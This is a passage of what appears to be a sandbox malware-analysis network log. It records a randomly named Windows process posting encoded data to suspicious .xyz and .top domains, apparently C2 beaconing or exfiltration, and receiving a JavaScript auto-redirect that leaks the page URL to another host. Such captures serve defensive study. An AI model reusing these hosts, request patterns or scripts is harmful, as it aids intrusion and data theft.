                                    Data Ascii: bB=BpjM1753d9U42+4KrAQ0MQGKXVunY+W0k8uh75zWqZVhq4tXIAZtnIidA5KGYThGPJOY8pAeogsSBZRCI9qR/sMre8eP2XZH6SffFLhk3JJvfL7gUPsKEjjzzPSfy/MegqYHt8nd/zznkppJ5TJ+5ygC73Keeh8JqLyxiI7LxR+oA7QIRHRaFnYvHpcGY9AkGgx4uVz3BaEX+n4rp2phWuy2xShSOgp6KjiF2W/l9ku5a89yzwE2k/uBqnoAqaaRUDu1E5ksqU0CyEZl13hibuSoNDdNUcJ2X4oIARfuTpJIvPToTKCUWote/InQzVtn0qpyhrQV2/MgU02IrDS4AXhHQAeNb11Z+mBAHM5R+uxB3Ug/U1Q6LUg4b62k86LN4+pOK4p9dWeZCqoGaKoKubUxiKmuWLdr6prbIUwmJ2eO82jz+ieA0MP/rNSTSei2qZ72TPw7k2QIiA0UyEhi7efIfVNULOj9S5001lPlWCvSrygkxgwOowrIi2Gj6FTRv4dic8V3EL2BUMa8BIN0EjFiApgbmcgtbLKAUZrvek/cHuH5N+2pVlCz5Nzk2Lr0GkHbop183LBLh83Iylno9jIl+hhbwsYe/jmgkOaPcRnECUXEWKRBsTUsqZHvw8noMSPNbaA/CHEhpaCqzQr9MnPxmI91DgdcZ+wyOg7581Eglf9cvkPloX6BJkUUq2lkyFG1GvsI2SY9N7BaRuIjTDmd/dew5oxVGXk4VUtq2jiIchk8Blcuyg0x+Mc8bVWjNy8ib4PNeEpL5H/Fmib6BCjH4eByPjXBsg08kuSKSC3QLPBFUSPTH+QcMLGEGEhSZsmoIDAUFL27UKoSTYvo3bulBij8FpzYQ57QR2z+haE0ITTnB7yNTfchfB0ZclIL+kNE3ETG3KXHuDQ/JYAz0gIQUWScHZSbEqq0wSms46quiOrv4Hrt6J/cY8j2Vy0wxh7B1goprFYtJg3Lk+Lt3ymp4UhwgJux8UzKqsFQmQ9AcRGkk [TRUNCATED]
                                    Jul 11, 2024 15:07:20.942728996 CEST868INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:20 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bfywAuq6TP66AJM00t%2BpvMGUqNzHrVvhWLY18f9pnMnKpCekVM0llttJsHu2cvLalRWJE3Q6GiYKE6UUcWaAI%2BjtY1pRZ3LsEjjILS86k3QNuJ5TMjI0ci%2B4VaPuLVLLuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190414ca9b433a-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff 0d 0a
                                    Data Ascii: fcLn0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~y
                                    Jul 11, 2024 15:07:20.943025112 CEST22INData Raw: 63 0d 0a e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: c2$;0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    24192.168.2.649748188.114.97.3806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:22.659610987 CEST577OUTGET /y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc= HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.ffi07s.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:23.577620029 CEST920INHTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:23 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mhj2QU2yuNbB3RPyEqvFPzhn1InLSTIV3veJucl6zqBUUtZ6FuVfPOZ2BcVJuWJSKFyCkqnL9TNeVTP5ptjN%2FMJl%2BYSFr8HUjByNOscGOEaT6tZ0iD%2F5BHDSqisKnhd%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1904252e24729e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 31 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 139<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>20


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    25192.168.2.649749154.222.238.52806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:30.927772999 CEST826OUTPOST /y0md/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.j51a.xyz
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.j51a.xyz
                                    Referer: http://www.j51a.xyz/y0md/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6f 6a 77 6c 77 7a 35 68 6a 42 62 2f 2f 6f 6c 68 36 56 67 34 72 57 79 54 32 36 58 6d 48 6e 73 36 5a 6d 31 55 4e 67 34 4d 69 70 41 55 4f 62 63 69 30 44 5a 68 38 36 7a 45 31 65 37 52 54 6a 79 6f 71 57 4c 6c 6d 58 37 54 4a 54 57 6d 6b 5a 31 37 6a 4d 34 75 72 39 56 2f 75 46 47 57 46 4f 30 42 78 46 54 38 32 73 73 42 30 2b 62 5a 2b 33 36 56 37 6d 50 58 63 72 4e 6b 33 30 32 74 69 4c 50 4a 51 6c 4f 6c 61 79 46 64 4a 42 5a 77 71 6b 68 65 74 32 6f 33 77 63 59 61 58 47 7a 33 46 36 4c 4e 69 48 75 37 69 47 58 71 6f 57 4c 2b 65 69 32 6e 7a 76 58 58 36 58 6e 33 55 61 44 78 57 42 47 79 35 4f 69 66 47 73 49 31 65 69 66 4f
                                    Data Ascii: bB=ojwlwz5hjBb//olh6Vg4rWyT26XmHns6Zm1UNg4MipAUObci0DZh86zE1e7RTjyoqWLlmX7TJTWmkZ17jM4ur9V/uFGWFO0BxFT82ssB0+bZ+36V7mPXcrNk302tiLPJQlOlayFdJBZwqkhet2o3wcYaXGz3F6LNiHu7iGXqoWL+ei2nzvXX6Xn3UaDxWBGy5OifGsI1eifO
                                    Jul 11, 2024 15:07:31.710470915 CEST557INHTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    26192.168.2.649750154.222.238.52806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:33.501312971 CEST850OUTPOST /y0md/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.j51a.xyz
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.j51a.xyz
                                    Referer: http://www.j51a.xyz/y0md/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6f 6a 77 6c 77 7a 35 68 6a 42 62 2f 39 4c 39 68 38 47 34 34 6e 6d 79 51 34 61 58 6d 4f 48 73 2b 5a 6d 4a 55 4e 6b 70 42 6a 62 30 55 4f 2b 59 69 37 69 5a 68 37 36 7a 45 74 4f 37 55 4c 44 79 33 71 57 4f 59 6d 58 48 54 4a 54 71 6d 6b 59 46 37 6a 39 35 34 74 74 56 39 32 31 47 59 4c 75 30 42 78 46 54 38 32 73 49 6e 30 2b 54 5a 2b 6e 4b 56 37 45 6e 49 53 4c 4e 6a 67 45 32 74 6d 4c 50 4e 51 6c 4f 58 61 7a 4a 37 4a 43 78 77 71 68 6c 65 74 48 70 68 35 63 59 59 61 6d 7a 6d 43 36 61 38 6d 45 75 2b 67 51 50 59 7a 47 75 65 53 30 33 39 76 63 58 30 6f 48 48 31 55 59 62 44 57 68 47 59 37 4f 61 66 55 37 45 53 52 57 36 74 79 74 75 46 76 63 59 5a 66 4e 63 6e 6a 51 2b 34 7a 78 66 78 36 41 3d 3d
                                    Data Ascii: bB=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjb0UO+Yi7iZh76zEtO7ULDy3qWOYmXHTJTqmkYF7j954ttV921GYLu0BxFT82sIn0+TZ+nKV7EnISLNjgE2tmLPNQlOXazJ7JCxwqhletHph5cYYamzmC6a8mEu+gQPYzGueS039vcX0oHH1UYbDWhGY7OafU7ESRW6tytuFvcYZfNcnjQ+4zxfx6A==
                                    Jul 11, 2024 15:07:34.281130075 CEST557INHTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.649751154.222.238.52806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:36.295028925 CEST1863OUTPOST /y0md/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.j51a.xyz
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.j51a.xyz
                                    Referer: http://www.j51a.xyz/y0md/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6f 6a 77 6c 77 7a 35 68 6a 42 62 2f 39 4c 39 68 38 47 34 34 6e 6d 79 51 34 61 58 6d 4f 48 73 2b 5a 6d 4a 55 4e 6b 70 42 6a 62 73 55 4f 6f 6b 69 30 68 68 68 36 36 7a 45 7a 65 37 56 4c 44 79 2b 71 57 32 63 6d 58 4c 6c 4a 56 6d 6d 72 61 68 37 30 35 4e 34 6b 74 56 39 71 46 47 5a 46 4f 30 59 78 46 44 34 32 73 34 6e 30 2b 54 5a 2b 6b 43 56 73 47 50 49 51 4c 4e 6b 33 30 32 78 69 4c 4f 71 51 6c 47 48 61 7a 64 4e 4f 79 52 77 71 42 56 65 2b 46 78 68 68 4d 59 57 55 47 79 37 43 36 57 6e 6d 45 7a 48 67 51 54 2b 7a 46 79 65 57 41 57 79 33 76 4b 70 79 47 76 33 41 34 50 42 59 6e 47 74 6a 66 4b 66 64 35 63 44 52 58 65 44 78 4e 75 6b 6e 74 49 66 66 4e 51 4a 6b 45 57 75 31 46 4b 4e 70 6d 32 78 5a 2b 50 6e 2f 39 6f 73 32 2f 4f 2f 72 61 4e 74 4c 47 37 67 61 68 32 64 52 32 65 62 56 78 30 2b 30 78 58 39 53 63 2f 4b 2b 57 74 38 48 62 55 51 6b 59 53 2b 2b 59 53 68 31 54 4f 48 74 6b 47 69 78 4b 37 65 49 73 31 4f 37 4e 4b 71 79 43 51 35 51 42 6b 76 71 4f 6f 63 70 63 52 4c 50 4a 39 37 79 6d 37 7a 36 58 54 72 68 70 4c [TRUNCATED]
                                    Data Ascii: bB=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjbsUOoki0hhh66zEze7VLDy+qW2cmXLlJVmmrah705N4ktV9qFGZFO0YxFD42s4n0+TZ+kCVsGPIQLNk302xiLOqQlGHazdNOyRwqBVe+FxhhMYWUGy7C6WnmEzHgQT+zFyeWAWy3vKpyGv3A4PBYnGtjfKfd5cDRXeDxNukntIffNQJkEWu1FKNpm2xZ+Pn/9os2/O/raNtLG7gah2dR2ebVx0+0xX9Sc/K+Wt8HbUQkYS++YSh1TOHtkGixK7eIs1O7NKqyCQ5QBkvqOocpcRLPJ97ym7z6XTrhpLA2vFPd5vXj5AD+4nYD4Co+VYpK+YC1UdkvzgzdV5P+lDYrAVajaKFZLKv8NiD/8HMp8Pu2N90n5K4aMfKqMKEudpc6j9bc3wfw6FTqr/rYOb/lq+PpY456amt9+pCuQvl3MkR7XYcfWjek3wre+ONmw2/sTqh3KVfZhixgf4y/zW0ER9fEpWcf/vXpjID9/awnlV982izJbJlre0Twdtwa5bO2repzj+CghvRQ2SG24AuUSJkyVfB/4sPLguD2EaTFWsUTaUdW0N9ZzhfacfhN9GgY3dSN49lNwbH1vPak+N/EGguj92cFVXhQSPdrjIXYhH8mEcZm75xuAzhLArjPSMXBkmsKoy9rmcNgkULDim1gXhvrOAPj0enlHUp5TH5KC6SNW5IGxKsjRufXB1+zibPJXiQqFF1ejFEM/hEaPiQVUDVXxBei3Q/nYfOEin1qGmeBQT++TF3Q8ROui+Tic/4wsQqzOjH9N2c1bggJE3z3vmeZmTIA7lYLAeFdWZctDqln+kyWuIxG2guDxqx3+a6dD3NKd0Kb4IxER7Z0OSQ5JSHC0xnV5md1F7C4MyTE/OJurNa4Zv/i+KjyK9v1T/59bjKT4xaFcA5bc9WCpWeMakUNIE2StXoLIOYgtiMl1st85hJ/lfe/pQ/3fE3WmVYugRSw8fzL [TRUNCATED]
                                    Jul 11, 2024 15:07:37.095194101 CEST557INHTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.649752154.222.238.52806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:38.871550083 CEST575OUTGET /y0md/?bB=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XnetdiFa9P8wohXrN8dkg8umKuQr54UaIPdByszOLqpj+dFvVfmQ=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.j51a.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:39.656439066 CEST557INHTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED]
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.649753162.254.38.56806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:07:45.121443987 CEST835OUTPOST /soqq/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dospole.top
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dospole.top
                                    Referer: http://www.dospole.top/soqq/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
